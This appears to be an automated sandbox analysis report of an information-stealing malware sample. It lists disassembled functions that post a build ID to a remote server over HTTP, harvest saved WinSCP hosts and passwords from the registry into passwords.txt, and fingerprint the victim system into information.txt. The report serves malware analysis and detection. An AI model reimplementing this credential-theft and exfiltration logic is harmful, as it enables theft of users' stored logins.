Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$"$"$------$------$------$------$------$------$build_id$dea7c01007a657ba0c601c941632f140$mode$status$task_id
API String ID: 3702379033-1200680179
Opcode ID: 255fa34982227563ec23004d57092c384de4894a28aea416c00251cec9b4c40f
Instruction ID: d31c18200e4d940aa2efbb563afedd8aa4db7ae68f21f6f976bb7167da3b4302
Opcode Fuzzy Hash: 255fa34982227563ec23004d57092c384de4894a28aea416c00251cec9b4c40f
Instruction Fuzzy Hash: 6D52A87194016D9ACF61EB62CD46BCCB375AF04308F4184E7A61D73161DAB46FCA8FA8

Function 00405F39 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 466
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
StrCmpCA.SHLWAPI(?), ref: 00405FF6
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
lstrlenA.KERNEL32(?,",mode,004378CC,------,004378C0,dea7c01007a657ba0c601c941632f140,",build_id,004378A8,------,0043789C,",00437890,------), ref: 004065FD
lstrlenA.KERNEL32(?), ref: 0040660C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
HeapAlloc.KERNEL32(00000000), ref: 0040661E
lstrlenA.KERNEL32(?), ref: 0040662B
_memmove.LIBCMT ref: 00406639
lstrlenA.KERNEL32(?), ref: 00406647
lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
_memmove.LIBCMT ref: 00406662
lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
InternetCloseHandle.WININET(00000000), ref: 004066ED
InternetCloseHandle.WININET(?), ref: 004066F9
InternetCloseHandle.WININET(?), ref: 00406705
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

mode, xrefs: 00406575
build_id, xrefs: 00406419
dea7c01007a657ba0c601c941632f140, xrefs: 00406471
vA, xrefs: 004067D8
", xrefs: 00406445
", xrefs: 004065A1
------, xrefs: 00406206
", xrefs: 004062E5
------, xrefs: 00406367
------, xrefs: 00406080
------, xrefs: 004064C9

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$------$------$------$------$build_id$dea7c01007a657ba0c601c941632f140$mode$vA
API String ID: 3702379033-515684272
Opcode ID: 310d5b17518bbb91fc8b38a3504f5ebd5836b0be108cc23e42b154e3351280a1
Instruction ID: b8248e7ffe4d41ee6dfe0b73e6c022778610830ac4afc6ca3c2c959f8e885423
Opcode Fuzzy Hash: 310d5b17518bbb91fc8b38a3504f5ebd5836b0be108cc23e42b154e3351280a1
Instruction Fuzzy Hash: ED22B9719401699BCF21FB62CD46BCDB775AF08308F4144E7A60DB3191DAB46ECA8F98

Function 0040E186 Relevance: 51.1, APIs: 15, Strings: 14, Instructions: 325
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040E1B7
_memset.LIBCMT ref: 0040E1D7
_memset.LIBCMT ref: 0040E1E8
_memset.LIBCMT ref: 0040E1F9
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,00436902), ref: 0040E379
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9

Strings

:22, xrefs: 0040E42D
UserName, xrefs: 0040E496
Soft: WinSCP, xrefs: 0040E2FE
UseMasterPassword, xrefs: 0040E24E
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040E20B
Password: , xrefs: 0040E529
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040E2B3
HostName, xrefs: 0040E367
Security, xrefs: 0040E253
PortNumber, xrefs: 0040E3BD
passwords.txt, xrefs: 0040E662
Host: , xrefs: 0040E32A
Password, xrefs: 0040E515
Login: , xrefs: 0040E459

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$Value$Open$Enum
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 3303087153-2798830873
Opcode ID: 4cb5d568804bd6091bc02e898b5ea18bb589d8c3a5a57f0ecc9d76581db75b32
Instruction ID: b22ccabc006f49c603b8efbc83c643ae1913ebf7150b1c37dd1f83d61b31b80b
Opcode Fuzzy Hash: 4cb5d568804bd6091bc02e898b5ea18bb589d8c3a5a57f0ecc9d76581db75b32
Instruction Fuzzy Hash: 1CD1D9B195012DAADB20EB91DC42BDDB779AF04308F5018EBA508B3191DA747FC9CFA5

Function 0041859C Relevance: 48.2, APIs: 32, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 004185DD
GetProcAddress.KERNEL32 ref: 004185F4
GetProcAddress.KERNEL32 ref: 0041860B
GetProcAddress.KERNEL32 ref: 00418622
GetProcAddress.KERNEL32 ref: 00418639
GetProcAddress.KERNEL32 ref: 00418650
GetProcAddress.KERNEL32 ref: 00418667
GetProcAddress.KERNEL32 ref: 0041867E
GetProcAddress.KERNEL32 ref: 00418695
GetProcAddress.KERNEL32 ref: 004186AC
GetProcAddress.KERNEL32 ref: 004186C3
GetProcAddress.KERNEL32 ref: 004186DA
GetProcAddress.KERNEL32 ref: 004186F1
GetProcAddress.KERNEL32 ref: 00418708
GetProcAddress.KERNEL32 ref: 0041871F
GetProcAddress.KERNEL32 ref: 00418736
GetProcAddress.KERNEL32 ref: 0041874D
GetProcAddress.KERNEL32 ref: 00418764
GetProcAddress.KERNEL32 ref: 0041877B
GetProcAddress.KERNEL32 ref: 00418792
LoadLibraryA.KERNEL32(?,0041841B), ref: 004187A3
LoadLibraryA.KERNEL32(?,0041841B), ref: 004187B4
LoadLibraryA.KERNEL32(?,0041841B), ref: 004187C5
LoadLibraryA.KERNEL32(?,0041841B), ref: 004187D6
LoadLibraryA.KERNEL32(?,0041841B), ref: 004187E7
GetProcAddress.KERNEL32(75A70000,0041841B), ref: 00418803
GetProcAddress.KERNEL32(75290000,0041841B), ref: 0041881E
GetProcAddress.KERNEL32 ref: 00418835
GetProcAddress.KERNEL32(75BD0000,0041841B), ref: 00418850
GetProcAddress.KERNEL32(75450000,0041841B), ref: 0041886B
GetProcAddress.KERNEL32(76E90000,0041841B), ref: 00418886
GetProcAddress.KERNEL32 ref: 0041889D

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 57c8f947dda2191afb8ee423370641b59de85ddd83cf3b5425d4ff56bb89df3f
Instruction ID: f9ee4e838ad8470c0991571640e74ffb0bcd5525b5d82f60009bd6a566ec43a0
Opcode Fuzzy Hash: 57c8f947dda2191afb8ee423370641b59de85ddd83cf3b5425d4ff56bb89df3f
Instruction Fuzzy Hash: A9710A75815302AFDB22DF61FC499653BB7F718307B21A126E902D66F0DBB24860EF51

Function 00413ADE Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16

Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436EC0,?,?,?,?,?), ref: 00411713

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71

GetCurrentProcessId.KERNEL32(Path: ,00436870,HWID: ,00436864,GUID: ,00436858,00000000,MachineID: ,00436848,00000000,Date: ,0043683C,00436838,004379A0,Version: ,004365B6), ref: 00413D33

Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,B=A,00000000,?), ref: 0041226C
Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E

Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413DED,Windows: ,00436894), ref: 00410B44
Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413DED,Windows: ,00436894), ref: 00410B4B

Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413E51,Install Date: ,004368A4,00000000,Windows: ,00436894,Work Dir: In memory,0043687C), ref: 0041181F
Part of subcall function 00411807: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413EBF,?,AV: ,004368B8,Install Date: ,004368A4,00000000,Windows: ,00436894,Work Dir: In memory,0043687C), ref: 004119AD
Part of subcall function 00411997: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00413FF0,?,Display Resolution: ,004368E8,00000000,User Name: ,004368D8,00000000,Computer Name: ,004368C4,AV: ,004368B8), ref: 004115A2
Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00413FF0,?,Display Resolution: ,004368E8,00000000,User Name: ,004368D8,00000000,Computer Name: ,004368C4,AV: ,004368B8,Install Date: ), ref: 004115A9
Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB

Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,00436707,?,?), ref: 00410E0C
Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF

Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D

Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,004141AA,Processor: ,[Hardware],00436944,00000000,TimeZone: ,00436934,00000000,Local Time: ,00436920), ref: 00410F65
Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,004141AA,Processor: ,[Hardware],00436944,00000000,TimeZone: ,00436934,00000000,Local Time: ,00436920,Keyboard Languages: ,00436904), ref: 00410F6C
Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,|hC,?,?,?,004141AA,Processor: ,[Hardware],00436944,00000000,TimeZone: ,00436934,00000000,Local Time: ), ref: 00410F8A
Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(|hC,00000000,00000000,00000000,000000FF,?,?,?,004141AA,Processor: ,[Hardware],00436944,00000000,TimeZone: ,00436934,00000000), ref: 00410FA6

Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB

Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC

Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436904,Display Resolution: ,004368E8,00000000,User Name: ,004368D8,00000000,Computer Name: ,004368C4,AV: ,004368B8,Install Date: ), ref: 00411131
Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A

Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9

Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0043673B,?,?), ref: 004114D4
Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D

Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043673A,00000000,?,?), ref: 00411273
Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E80), ref: 004113DC

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436904,Display Resolution: ,004368E8,00000000,User Name: ,004368D8,00000000), ref: 004144BB

Part of subcall function 00416DF0: CreateThread.KERNEL32(00000000,00000000,00416D1F,?,00000000,00000000), ref: 00416E8F
Part of subcall function 00416DF0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416E97

Strings

Local Time: , xrefs: 004140A3
Display Resolution: , xrefs: 00413FC7
Processor: , xrefs: 00414185
MachineID: , xrefs: 00413BD8
information.txt, xrefs: 004144CB
TimeZone: , xrefs: 00414104
[Hardware], xrefs: 00414165
Install Date: , xrefs: 00413E29
VideoCard: , xrefs: 0041430F
Path: , xrefs: 00413D13
RAM: , xrefs: 004142A8
GUID: , xrefs: 00413C39
User Name: , xrefs: 00413F66
Version: , xrefs: 00413AF7
Work Dir: In memory, xrefs: 00413D88
[Software], xrefs: 004143FB
AV: , xrefs: 00413E96
HWID: , xrefs: 00413CA6
Windows: , xrefs: 00413DC8
Cores: , xrefs: 004141E6
Date: , xrefs: 00413B77
Computer Name: , xrefs: 00413F05
Threads: , xrefs: 00414247
Keyboard Languages: , xrefs: 00414036
[Processes], xrefs: 00414382

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 3279995179-1014693891
Opcode ID: 2aa1bc65d79230cd69bced730905e56799a6ff47bd23bab8a6d80cfb90957054
Instruction ID: 29bb6ce447a24236af55a84bfd1627b3b828feca4e425002200aa2d0be6811b1
Opcode Fuzzy Hash: 2aa1bc65d79230cd69bced730905e56799a6ff47bd23bab8a6d80cfb90957054
Instruction Fuzzy Hash: A4527C71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB510771A1DBB8BE8E8B98

Function 0040852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,0043718C,004367C2,?,?,?), ref: 004085D3
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
lstrlenA.KERNEL32(?), ref: 004086CB
lstrcatA.KERNEL32(?), ref: 004086E4
lstrcatA.KERNEL32(?,?), ref: 004086EE
lstrcatA.KERNEL32(?,00437190), ref: 004086FA
